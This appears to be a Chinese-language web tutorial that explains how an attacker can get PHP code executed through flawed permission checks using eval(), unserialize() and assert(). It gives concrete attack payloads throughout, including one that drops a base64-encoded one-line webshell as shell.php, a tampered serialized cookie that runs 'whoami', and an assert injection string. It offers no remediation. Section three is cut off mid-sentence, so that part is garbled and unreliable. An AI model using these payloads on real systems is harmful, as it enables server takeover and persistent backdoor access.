权限验证如何触发php代码执行_权限验证触发php代码执行方法【技巧】

攻击者可通过eval()注入、反序列化漏洞及assert()函数绕过权限验证执行PHP代码：一、利用未过滤的eval()执行恶意角色参数；二、通过unserialize()触发危险魔术方法；三、用assert()替代eval()执行传入表达式。

当Web应用程序在权限验证环节存在逻辑缺陷或不安全的代码调用时，攻击者可能通过构造特定请求绕过校验并触发PHP代码执行。以下是几种常见的权限验证触发PHP代码执行的方法：

一、利用eval()函数配合未过滤的权限参数

某些系统将用户角色、模块标识等权限信息以字符串形式传入eval()执行，若该字符串未经过严格白名单校验，可被注入恶意PHP代码。

1、识别目标页面中是否存在类似eval("return $role_check;");的动态执行逻辑。

2、在请求中提交包含PHP代码的role参数，例如：role=1; phpinfo(); exit;。

立即学习“PHP免费学习笔记（深入）”；

3、观察响应体是否输出phpinfo()结果或报错信息中暴露代码执行痕迹。

4、确认成功后，替换为更隐蔽的payload，如：role=1; @file_put_contents('shell.php', base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ3o0J10pOz8+')); exit;。

二、通过反序列化漏洞在权限校验流程中触发__wakeup()或__destruct()

部分权限验证模块使用unserialize()解析用户可控的session或cookie数据，若类中定义了危险魔术方法且存在可利用的链，则可在反序列化过程中执行任意PHP代码。

1、捕获登录或鉴权请求中的serialized字符串，例如Cookie中的user_token=O:8:"UserAuth":1:{s:4:"role";s:5:"admin";}。

2、查找应用源码中已定义且含危险操作的类，重点关注__wakeup()内调用system()、exec()或file_put_contents()的类。

3、构造恶意序列化字符串，使反序列化后触发代码执行，例如注入s:4:"cmd";s:12:"whoami > a.txt";并匹配对应属性。

4、发送篡改后的序列化数据至权限验证接口，检查服务器是否生成预期文件或执行命令。

三、利用assert()函数替代eval()执行传入表达式

PHP低版本（

1、搜索代码中形如assert($_GET['perm'] . ' === "admin"');的语句。

2、向perm参数提交闭合原表达式的payload，例如：perm=1); phpinfo(); //。

标签： php cookie session web应用程序 权限验证